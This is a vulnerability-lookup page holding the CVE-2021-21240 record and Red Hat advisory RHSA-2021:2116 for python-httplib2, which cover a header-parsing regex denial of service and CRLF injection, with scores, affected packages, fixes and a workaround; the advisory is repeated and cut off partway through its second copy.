Action not permitted
Modal body text goes here.
Modal Title
Modal Body
CVE-2021-21240
Vulnerability from cvelistv5
Published
2021-02-08 19:45
Modified
2024-08-03 18:09
Severity ?
EPSS score ?
Summary
httplib2 is a comprehensive HTTP client library for Python. In httplib2 before version 0.19.0, a malicious server which responds with long series of "\xa0" characters in the "www-authenticate" header may cause Denial of Service (CPU burn while parsing header) of the httplib2 client accessing said server. This is fixed in version 0.19.0 which contains a new implementation of auth headers parsing using the pyparsing library.
References
{ containers: { adp: [ { providerMetadata: { dateUpdated: "2024-08-03T18:09:14.827Z", orgId: "af854a3a-2127-422b-91ae-364da2661108", shortName: "CVE", }, references: [ { tags: [ "x_refsource_CONFIRM", "x_transferred", ], url: "https://github.com/httplib2/httplib2/security/advisories/GHSA-93xj-8mrv-444m", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://github.com/httplib2/httplib2/pull/182", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://github.com/httplib2/httplib2/commit/bd9ee252c8f099608019709e22c0d705e98d26bc", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://pypi.org/project/httplib2", }, ], title: "CVE Program Container", }, ], cna: { affected: [ { product: "httplib2", vendor: "httplib2", versions: [ { status: "affected", version: "< 0.19.0", }, ], }, ], descriptions: [ { lang: "en", value: "httplib2 is a comprehensive HTTP client library for Python. In httplib2 before version 0.19.0, a malicious server which responds with long series of \"\\xa0\" characters in the \"www-authenticate\" header may cause Denial of Service (CPU burn while parsing header) of the httplib2 client accessing said server. This is fixed in version 0.19.0 which contains a new implementation of auth headers parsing using the pyparsing library.", }, ], metrics: [ { cvssV3_1: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 7.5, baseSeverity: "HIGH", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", version: "3.1", }, }, ], problemTypes: [ { descriptions: [ { cweId: "CWE-400", description: "CWE-400 Uncontrolled Resource Consumption", lang: "en", type: "CWE", }, ], }, ], providerMetadata: { dateUpdated: "2021-02-08T19:45:19", orgId: "a0819718-46f1-4df5-94e2-005712e83aaa", shortName: "GitHub_M", }, references: [ { tags: [ "x_refsource_CONFIRM", ], url: "https://github.com/httplib2/httplib2/security/advisories/GHSA-93xj-8mrv-444m", }, { tags: [ "x_refsource_MISC", ], url: "https://github.com/httplib2/httplib2/pull/182", }, { tags: [ "x_refsource_MISC", ], url: "https://github.com/httplib2/httplib2/commit/bd9ee252c8f099608019709e22c0d705e98d26bc", }, { tags: [ "x_refsource_MISC", ], url: "https://pypi.org/project/httplib2", }, ], source: { advisory: "GHSA-93xj-8mrv-444m", discovery: "UNKNOWN", }, title: "Regular Expression Denial of Service in httplib2", x_legacyV4Record: { CVE_data_meta: { ASSIGNER: "security-advisories@github.com", ID: "CVE-2021-21240", STATE: "PUBLIC", TITLE: "Regular Expression Denial of Service in httplib2", }, affects: { vendor: { vendor_data: [ { product: { product_data: [ { product_name: "httplib2", version: { version_data: [ { version_value: "< 0.19.0", }, ], }, }, ], }, vendor_name: "httplib2", }, ], }, }, data_format: "MITRE", data_type: "CVE", data_version: "4.0", description: { description_data: [ { lang: "eng", value: "httplib2 is a comprehensive HTTP client library for Python. In httplib2 before version 0.19.0, a malicious server which responds with long series of \"\\xa0\" characters in the \"www-authenticate\" header may cause Denial of Service (CPU burn while parsing header) of the httplib2 client accessing said server. This is fixed in version 0.19.0 which contains a new implementation of auth headers parsing using the pyparsing library.", }, ], }, impact: { cvss: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 7.5, baseSeverity: "HIGH", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", version: "3.1", }, }, problemtype: { problemtype_data: [ { description: [ { lang: "eng", value: "CWE-400 Uncontrolled Resource Consumption", }, ], }, ], }, references: { reference_data: [ { name: "https://github.com/httplib2/httplib2/security/advisories/GHSA-93xj-8mrv-444m", refsource: "CONFIRM", url: "https://github.com/httplib2/httplib2/security/advisories/GHSA-93xj-8mrv-444m", }, { name: "https://github.com/httplib2/httplib2/pull/182", refsource: "MISC", url: "https://github.com/httplib2/httplib2/pull/182", }, { name: "https://github.com/httplib2/httplib2/commit/bd9ee252c8f099608019709e22c0d705e98d26bc", refsource: "MISC", url: "https://github.com/httplib2/httplib2/commit/bd9ee252c8f099608019709e22c0d705e98d26bc", }, { name: "https://pypi.org/project/httplib2", refsource: "MISC", url: "https://pypi.org/project/httplib2", }, ], }, source: { advisory: "GHSA-93xj-8mrv-444m", discovery: "UNKNOWN", }, }, }, }, cveMetadata: { assignerOrgId: "a0819718-46f1-4df5-94e2-005712e83aaa", assignerShortName: "GitHub_M", cveId: "CVE-2021-21240", datePublished: "2021-02-08T19:45:19", dateReserved: "2020-12-22T00:00:00", dateUpdated: "2024-08-03T18:09:14.827Z", state: "PUBLISHED", }, dataType: "CVE_RECORD", dataVersion: "5.1", "vulnerability-lookup:meta": { nvd: "{\"cve\":{\"id\":\"CVE-2021-21240\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2021-02-08T20:15:12.197\",\"lastModified\":\"2024-11-21T05:47:50.650\",\"vulnStatus\":\"Modified\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"httplib2 is a comprehensive HTTP client library for Python. In httplib2 before version 0.19.0, a malicious server which responds with long series of \\\"\\\\xa0\\\" characters in the \\\"www-authenticate\\\" header may cause Denial of Service (CPU burn while parsing header) of the httplib2 client accessing said server. This is fixed in version 0.19.0 which contains a new implementation of auth headers parsing using the pyparsing library.\"},{\"lang\":\"es\",\"value\":\"httplib2 es una biblioteca cliente HTTP completa para Python. En httplib2 anterior a la versión 0.19.0, un servidor malicioso que responde con una larga serie de caracteres \\\"\\\\xa0\\\" en el encabezado \\\"www-authenticate\\\" puede causar una Denegación de Servicio (CPU quemada mientras analiza el encabezado) del cliente httplib2 que accede a dicho servidor. Esto se corrigió en la versión 0.19.0, que contiene una nueva implementación de análisis de encabezados de autenticación usando la biblioteca pyparsing\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\",\"baseScore\":7.5,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":3.9,\"impactScore\":3.6},{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\",\"baseScore\":7.5,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":3.9,\"impactScore\":3.6}],\"cvssMetricV2\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"2.0\",\"vectorString\":\"AV:N/AC:L/Au:N/C:N/I:N/A:P\",\"baseScore\":5.0,\"accessVector\":\"NETWORK\",\"accessComplexity\":\"LOW\",\"authentication\":\"NONE\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"PARTIAL\"},\"baseSeverity\":\"MEDIUM\",\"exploitabilityScore\":10.0,\"impactScore\":2.9,\"acInsufInfo\":false,\"obtainAllPrivilege\":false,\"obtainUserPrivilege\":false,\"obtainOtherPrivilege\":false,\"userInteractionRequired\":false}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-400\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:httplib2_project:httplib2:*:*:*:*:*:python:*:*\",\"versionEndExcluding\":\"0.19.0\",\"matchCriteriaId\":\"D5BA135E-6889-4A5D-88F6-1AD4DBC498BE\"}]}]}],\"references\":[{\"url\":\"https://github.com/httplib2/httplib2/commit/bd9ee252c8f099608019709e22c0d705e98d26bc\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\",\"Third Party Advisory\"]},{\"url\":\"https://github.com/httplib2/httplib2/pull/182\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\",\"Third Party Advisory\"]},{\"url\":\"https://github.com/httplib2/httplib2/security/advisories/GHSA-93xj-8mrv-444m\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Mitigation\",\"Third Party Advisory\"]},{\"url\":\"https://pypi.org/project/httplib2\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Product\",\"Third Party Advisory\"]},{\"url\":\"https://github.com/httplib2/httplib2/commit/bd9ee252c8f099608019709e22c0d705e98d26bc\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Patch\",\"Third Party Advisory\"]},{\"url\":\"https://github.com/httplib2/httplib2/pull/182\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Patch\",\"Third Party Advisory\"]},{\"url\":\"https://github.com/httplib2/httplib2/security/advisories/GHSA-93xj-8mrv-444m\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Exploit\",\"Mitigation\",\"Third Party Advisory\"]},{\"url\":\"https://pypi.org/project/httplib2\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Product\",\"Third Party Advisory\"]}]}}", }, }
rhsa-2021:2116
Vulnerability from csaf_redhat
Published
2021-05-26 11:48
Modified
2025-03-14 17:33
Summary
Red Hat Security Advisory: Red Hat OpenStack Platform 16.1.6 (python-httplib2) security update
Notes
Topic
An update for python-httplib2 is now available for Red Hat OpenStack
Platform 16.1 (Train).
Red Hat Product Security has rated this update as having a security impact
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which
gives a detailed severity rating, is available for each vulnerability from
the CVE link(s) in the References section.
Details
A comprehensive HTTP client library that supports many features left out of other HTTP libraries.
Security Fix(es):
* CRLF injection via an attacker controlled unescaped part of uri for
httplib2.Http.request function (CVE-2020-11078)
* Regular expression denial of service via malicious header
(CVE-2021-21240)
For more details about the security issue(s), including the impact, a CVSS
score, acknowledgments, and other related information, refer to the CVE
page listed in the References section.
Terms of Use
This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
{ document: { aggregate_severity: { namespace: "https://access.redhat.com/security/updates/classification/", text: "Moderate", }, category: "csaf_security_advisory", csaf_version: "2.0", distribution: { text: "Copyright © Red Hat, Inc. All rights reserved.", tlp: { label: "WHITE", url: "https://www.first.org/tlp/", }, }, lang: "en", notes: [ { category: "summary", text: "An update for python-httplib2 is now available for Red Hat OpenStack\nPlatform 16.1 (Train).\n\nRed Hat Product Security has rated this update as having a security impact\nof Moderate. A Common Vulnerability Scoring System (CVSS) base score, which\ngives a detailed severity rating, is available for each vulnerability from\nthe CVE link(s) in the References section.", title: "Topic", }, { category: "general", text: "A comprehensive HTTP client library that supports many features left out of other HTTP libraries.\n\nSecurity Fix(es):\n\n* CRLF injection via an attacker controlled unescaped part of uri for\nhttplib2.Http.request function (CVE-2020-11078)\n\n* Regular expression denial of service via malicious header\n(CVE-2021-21240)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage listed in the References section.", title: "Details", }, { category: "legal_disclaimer", text: "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.", title: "Terms of Use", }, ], publisher: { category: "vendor", contact_details: "https://access.redhat.com/security/team/contact/", issuing_authority: "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.", name: "Red Hat Product Security", namespace: "https://www.redhat.com", }, references: [ { category: "self", summary: "https://access.redhat.com/errata/RHSA-2021:2116", url: "https://access.redhat.com/errata/RHSA-2021:2116", }, { category: "external", summary: "https://access.redhat.com/security/updates/classification/#moderate", url: "https://access.redhat.com/security/updates/classification/#moderate", }, { category: "external", summary: "1845937", url: "https://bugzilla.redhat.com/show_bug.cgi?id=1845937", }, { category: "external", summary: "1926885", url: "https://bugzilla.redhat.com/show_bug.cgi?id=1926885", }, { category: "self", summary: "Canonical URL", url: "https://security.access.redhat.com/data/csaf/v2/advisories/2021/rhsa-2021_2116.json", }, ], title: "Red Hat Security Advisory: Red Hat OpenStack Platform 16.1.6 (python-httplib2) security update", tracking: { current_release_date: "2025-03-14T17:33:12+00:00", generator: { date: "2025-03-14T17:33:12+00:00", engine: { name: "Red Hat SDEngine", version: "4.4.1", }, }, id: "RHSA-2021:2116", initial_release_date: "2021-05-26T11:48:28+00:00", revision_history: [ { date: "2021-05-26T11:48:28+00:00", number: "1", summary: "Initial version", }, { date: "2021-05-26T11:48:28+00:00", number: "2", summary: "Last updated version", }, { date: "2025-03-14T17:33:12+00:00", number: "3", summary: "Last generated version", }, ], status: "final", version: "3", }, }, product_tree: { branches: [ { branches: [ { branches: [ { category: "product_name", name: "Red Hat OpenStack Platform 16.1", product: { name: "Red Hat OpenStack Platform 16.1", product_id: "8Base-RHOS-CINDERLIB-16.1", product_identification_helper: { cpe: "cpe:/a:redhat:openstack:16.1::el8", }, }, }, ], category: "product_family", name: "Red Hat OpenStack Platform", }, { branches: [ { category: "product_version", name: "python-httplib2-0:0.13.1-2.el8ost.src", product: { name: "python-httplib2-0:0.13.1-2.el8ost.src", product_id: "python-httplib2-0:0.13.1-2.el8ost.src", product_identification_helper: { purl: "pkg:rpm/redhat/python-httplib2@0.13.1-2.el8ost?arch=src", }, }, }, ], category: "architecture", name: "src", }, { branches: [ { category: "product_version", name: "python3-httplib2-0:0.13.1-2.el8ost.noarch", product: { name: "python3-httplib2-0:0.13.1-2.el8ost.noarch", product_id: "python3-httplib2-0:0.13.1-2.el8ost.noarch", product_identification_helper: { purl: "pkg:rpm/redhat/python3-httplib2@0.13.1-2.el8ost?arch=noarch", }, }, }, ], category: "architecture", name: "noarch", }, ], category: "vendor", name: "Red Hat", }, ], relationships: [ { category: "default_component_of", full_product_name: { name: "python-httplib2-0:0.13.1-2.el8ost.src as a component of Red Hat OpenStack Platform 16.1", product_id: "8Base-RHOS-CINDERLIB-16.1:python-httplib2-0:0.13.1-2.el8ost.src", }, product_reference: "python-httplib2-0:0.13.1-2.el8ost.src", relates_to_product_reference: "8Base-RHOS-CINDERLIB-16.1", }, { category: "default_component_of", full_product_name: { name: "python3-httplib2-0:0.13.1-2.el8ost.noarch as a component of Red Hat OpenStack Platform 16.1", product_id: "8Base-RHOS-CINDERLIB-16.1:python3-httplib2-0:0.13.1-2.el8ost.noarch", }, product_reference: "python3-httplib2-0:0.13.1-2.el8ost.noarch", relates_to_product_reference: "8Base-RHOS-CINDERLIB-16.1", }, ], }, vulnerabilities: [ { cve: "CVE-2020-11078", cwe: { id: "CWE-113", name: "Improper Neutralization of CRLF Sequences in HTTP Headers ('HTTP Request/Response Splitting')", }, discovery_date: "2020-05-20T00:00:00+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "1845937", }, ], notes: [ { category: "description", text: "A flaw was found in python-httplib2. An attacker controlling an unescaped part of uri for `httplib2.Http.request()` could change request headers and body, send additional hidden requests to same server. This vulnerability impacts software that uses httplib2 with uri constructed by string concatenation, as opposed to proper urllib building with escaping.", title: "Vulnerability description", }, { category: "summary", text: "python-httplib2: CRLF injection via an attacker controlled unescaped part of uri for httplib2.Http.request function", title: "Vulnerability summary", }, { category: "other", text: "While Red Hat Quay 3.0, and 3.1 used the httplib2 library it was removed in versions 3.2 and later. Upgrade to 3.2 or later to fix this vulnerability in Red Hat Quay.\n\nRed Hat Gluster Storage 3 delivers the affected version of the python-httplib2 library. However the library is not used by Gluster hence the impact by this vulnerability is low.\n\nThis issue affects the version of the python-httplib2 library as shipped with Red Hat Ceph Storage (RHCS) version 2. Ceph-2 has reached End of Extended Life Cycle Support and no longer fixing moderates/lows.\n\nThere's currently no known vector to exploit this when using Python versions with CVE-2019-9740 and CVE-2019-9947 fixed.\n\nIn Red Hat OpenStack Platform13, because the flaw has a lower impact and the package's indirect usage in RHOSP cannot be exploited, no update will be provided at this time for the RHOSP python-httplib2 package.", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-RHOS-CINDERLIB-16.1:python-httplib2-0:0.13.1-2.el8ost.src", "8Base-RHOS-CINDERLIB-16.1:python3-httplib2-0:0.13.1-2.el8ost.noarch", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2020-11078", }, { category: "external", summary: "RHBZ#1845937", url: "https://bugzilla.redhat.com/show_bug.cgi?id=1845937", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2020-11078", url: "https://www.cve.org/CVERecord?id=CVE-2020-11078", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2020-11078", url: "https://nvd.nist.gov/vuln/detail/CVE-2020-11078", }, { category: "external", summary: "https://github.com/httplib2/httplib2/security/advisories/GHSA-gg84-qgv9-w4pq", url: "https://github.com/httplib2/httplib2/security/advisories/GHSA-gg84-qgv9-w4pq", }, ], release_date: "2020-05-20T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2021-05-26T11:48:28+00:00", details: "For details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-RHOS-CINDERLIB-16.1:python-httplib2-0:0.13.1-2.el8ost.src", "8Base-RHOS-CINDERLIB-16.1:python3-httplib2-0:0.13.1-2.el8ost.noarch", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2021:2116", }, ], scores: [ { cvss_v3: { attackComplexity: "HIGH", attackVector: "NETWORK", availabilityImpact: "NONE", baseScore: 6.8, baseSeverity: "MEDIUM", confidentialityImpact: "NONE", integrityImpact: "HIGH", privilegesRequired: "NONE", scope: "CHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:H/A:N", version: "3.1", }, products: [ "8Base-RHOS-CINDERLIB-16.1:python-httplib2-0:0.13.1-2.el8ost.src", "8Base-RHOS-CINDERLIB-16.1:python3-httplib2-0:0.13.1-2.el8ost.noarch", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "python-httplib2: CRLF injection via an attacker controlled unescaped part of uri for httplib2.Http.request function", }, { cve: "CVE-2021-21240", cwe: { id: "CWE-400", name: "Uncontrolled Resource Consumption", }, discovery_date: "2021-02-09T00:00:00+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "1926885", }, ], notes: [ { category: "description", text: "An uncontrolled resource consumption flaw as found in python-httplib2, due to a flawed regular expression used while parsing the WWW-Authenticate header in an HTTP response. This flaw allows a malicious or compromised server to reply with a crafted sequence of characters in the WWW-Authenticate header, leading to a denial of service of the httplib2 client accessing the server. The highest threat from this vulnerability is to system availability.", title: "Vulnerability description", }, { category: "summary", text: "python-httplib2: Regular expression denial of service via malicious header", title: "Vulnerability summary", }, { category: "other", text: "This flaw has been rated as having a security impact of Low, because it requires a malicious or compromised server in order to be exploited, and it only affects the HTTP client. In Red Hat OpenStack Platform 13, because the flaw has a lower impact and the fix would require a substantial amount of development, no update will be provided at this time for the RHOSP 13 python-httplib2 package.", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-RHOS-CINDERLIB-16.1:python-httplib2-0:0.13.1-2.el8ost.src", "8Base-RHOS-CINDERLIB-16.1:python3-httplib2-0:0.13.1-2.el8ost.noarch", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2021-21240", }, { category: "external", summary: "RHBZ#1926885", url: "https://bugzilla.redhat.com/show_bug.cgi?id=1926885", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2021-21240", url: "https://www.cve.org/CVERecord?id=CVE-2021-21240", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2021-21240", url: "https://nvd.nist.gov/vuln/detail/CVE-2021-21240", }, { category: "external", summary: "https://github.com/httplib2/httplib2/security/advisories/GHSA-93xj-8mrv-444m", url: "https://github.com/httplib2/httplib2/security/advisories/GHSA-93xj-8mrv-444m", }, ], release_date: "2021-01-09T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2021-05-26T11:48:28+00:00", details: "For details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-RHOS-CINDERLIB-16.1:python-httplib2-0:0.13.1-2.el8ost.src", "8Base-RHOS-CINDERLIB-16.1:python3-httplib2-0:0.13.1-2.el8ost.noarch", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2021:2116", }, { category: "workaround", details: "Use strict mode to parse WWW-Authenticate headers. This can be done by setting `httplib2.USE_WWW_AUTH_STRICT_PARSING = True`. Please note, however, that strict mode might lead to bad results in case of ill-formed header values.", product_ids: [ "8Base-RHOS-CINDERLIB-16.1:python-httplib2-0:0.13.1-2.el8ost.src", "8Base-RHOS-CINDERLIB-16.1:python3-httplib2-0:0.13.1-2.el8ost.noarch", ], }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 7.5, baseSeverity: "HIGH", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", version: "3.1", }, products: [ "8Base-RHOS-CINDERLIB-16.1:python-httplib2-0:0.13.1-2.el8ost.src", "8Base-RHOS-CINDERLIB-16.1:python3-httplib2-0:0.13.1-2.el8ost.noarch", ], }, ], threats: [ { category: "impact", details: "Low", }, ], title: "python-httplib2: Regular expression denial of service via malicious header", }, ], }
RHSA-2021:2116
Vulnerability from csaf_redhat
Published
2021-05-26 11:48
Modified
2025-03-14 17:33
Summary
Red Hat Security Advisory: Red Hat OpenStack Platform 16.1.6 (python-httplib2) security update
Notes
Topic
An update for python-httplib2 is now available for Red Hat OpenStack
Platform 16.1 (Train).
Red Hat Product Security has rated this update as having a security impact
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which
gives a detailed severity rating, is available for each vulnerability from
the CVE link(s) in the References section.
Details
A comprehensive HTTP client library that supports many features left out of other HTTP libraries.
Security Fix(es):
* CRLF injection via an attacker controlled unescaped part of uri for
httplib2.Http.request function (CVE-2020-11078)
* Regular expression denial of service via malicious header
(CVE-2021-21240)
For more details about the security issue(s), including the impact, a CVSS
score, acknowledgments, and other related information, refer to the CVE
page listed in the References section.
Terms of Use
This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
{ document: { aggregate_severity: { namespace: "https://access.redhat.com/security/updates/classification/", text: "Moderate", }, category: "csaf_security_advisory", csaf_version: "2.0", distribution: { text: "Copyright © Red Hat, Inc. All rights reserved.", tlp: { label: "WHITE", url: "https://www.first.org/tlp/", }, }, lang: "en", notes: [ { category: "summary", text: "An update for python-httplib2 is now available for Red Hat OpenStack\nPlatform 16.1 (Train).\n\nRed Hat Product Security has rated this update as having a security impact\nof Moderate. A Common Vulnerability Scoring System (CVSS) base score, which\ngives a detailed severity rating, is available for each vulnerability from\nthe CVE link(s) in the References section.", title: "Topic", }, { category: "general", text: "A comprehensive HTTP client library that supports many features left out of other HTTP libraries.\n\nSecurity Fix(es):\n\n* CRLF injection via an attacker controlled unescaped part of uri for\nhttplib2.Http.request function (CVE-2020-11078)\n\n* Regular expression denial of service via malicious header\n(CVE-2021-21240)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage listed in the References section.", title: "Details", }, { category: "legal_disclaimer", text: "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.", title: "Terms of Use", }, ], publisher: { category: "vendor", contact_details: "https://access.redhat.com/security/team/contact/", issuing_authority: "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.", name: "Red Hat Product Security", namespace: "https://www.redhat.com", }, references: [ { category: "self", summary: "https://access.redhat.com/errata/RHSA-2021:2116", url: "https://access.redhat.com/errata/RHSA-2021:2116", }, { category: "external", summary: "https://access.redhat.com/security/updates/classification/#moderate", url: "https://access.redhat.com/security/updates/classification/#moderate", }, { category: "external", summary: "1845937", url: "https://bugzilla.redhat.com/show_bug.cgi?id=1845937", }, { category: "external", summary: "1926885", url: "https://bugzilla.redhat.com/show_bug.cgi?id=1926885", }, { category: "self", summary: "Canonical URL", url: "https://security.access.redhat.com/data/csaf/v2/advisories/2021/rhsa-2021_2116.json", }, ], title: "Red Hat Security Advisory: Red Hat OpenStack Platform 16.1.6 (python-httplib2) security update", tracking: { current_release_date: "2025-03-14T17:33:12+00:00", generator: { date: "2025-03-14T17:33:12+00:00", engine: { name: "Red Hat SDEngine", version: "4.4.1", }, }, id: "RHSA-2021:2116", initial_release_date: "2021-05-26T11:48:28+00:00", revision_history: [ { date: "2021-05-26T11:48:28+00:00", number: "1", summary: "Initial version", }, { date: "2021-05-26T11:48:28+00:00", number: "2", summary: "Last updated version", }, { date: "2025-03-14T17:33:12+00:00", number: "3", summary: "Last generated version", }, ], status: "final", version: "3", }, }, product_tree: { branches: [ { branches: [ { branches: [ { category: "product_name", name: "Red Hat OpenStack Platform 16.1", product: { name: "Red Hat OpenStack Platform 16.1", product_id: "8Base-RHOS-CINDERLIB-16.1", product_identification_helper: { cpe: "cpe:/a:redhat:openstack:16.1::el8", }, }, }, ], category: "product_family", name: "Red Hat OpenStack Platform", }, { branches: [ { category: "product_version", name: "python-httplib2-0:0.13.1-2.el8ost.src", product: { name: "python-httplib2-0:0.13.1-2.el8ost.src", product_id: "python-httplib2-0:0.13.1-2.el8ost.src", product_identification_helper: { purl: "pkg:rpm/redhat/python-httplib2@0.13.1-2.el8ost?arch=src", }, }, }, ], category: "architecture", name: "src", }, { branches: [ { category: "product_version", name: "python3-httplib2-0:0.13.1-2.el8ost.noarch", product: { name: "python3-httplib2-0:0.13.1-2.el8ost.noarch", product_id: "python3-httplib2-0:0.13.1-2.el8ost.noarch", product_identification_helper: { purl: "pkg:rpm/redhat/python3-httplib2@0.13.1-2.el8ost?arch=noarch", }, }, }, ], category: "architecture", name: "noarch", }, ], category: "vendor", name: "Red Hat", }, ], relationships: [ { category: "default_component_of", full_product_name: { name: "python-httplib2-0:0.13.1-2.el8ost.src as a component of Red Hat OpenStack Platform 16.1", product_id: "8Base-RHOS-CINDERLIB-16.1:python-httplib2-0:0.13.1-2.el8ost.src", }, product_reference: "python-httplib2-0:0.13.1-2.el8ost.src", relates_to_product_reference: "8Base-RHOS-CINDERLIB-16.1", }, { category: "default_component_of", full_product_name: { name: "python3-httplib2-0:0.13.1-2.el8ost.noarch as a component of Red Hat OpenStack Platform 16.1", product_id: "8Base-RHOS-CINDERLIB-16.1:python3-httplib2-0:0.13.1-2.el8ost.noarch", }, product_reference: "python3-httplib2-0:0.13.1-2.el8ost.noarch", relates_to_product_reference: "8Base-RHOS-CINDERLIB-16.1", }, ], }, vulnerabilities: [ { cve: "CVE-2020-11078", cwe: { id: "CWE-113", name: "Improper Neutralization of CRLF Sequences in HTTP Headers ('HTTP Request/Response Splitting')", }, discovery_date: "2020-05-20T00:00:00+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "1845937", }, ], notes: [ { category: "description", text: "A flaw was found in python-httplib2. An attacker controlling an unescaped part of uri for `httplib2.Http.request()` could change request headers and body, send additional hidden requests to same server. This vulnerability impacts software that uses httplib2 with uri constructed by string concatenation, as opposed to proper urllib building with escaping.", title: "Vulnerability description", }, { category: "summary", text: "python-httplib2: CRLF injection via an attacker controlled unescaped part of uri for httplib2.Http.request function", title: "Vulnerability summary", }, { category: "other", text: "While Red Hat Quay 3.0, and 3.1 used the httplib2 library it was removed in versions 3.2 and later. Upgrade to 3.2 or later to fix this vulnerability in Red Hat Quay.\n\nRed Hat Gluster Storage 3 delivers the affected version of the python-httplib2 library. However the library is not used by Gluster hence the impact by this vulnerability is low.\n\nThis issue affects the version of the python-httplib2 library as shipped with Red Hat Ceph 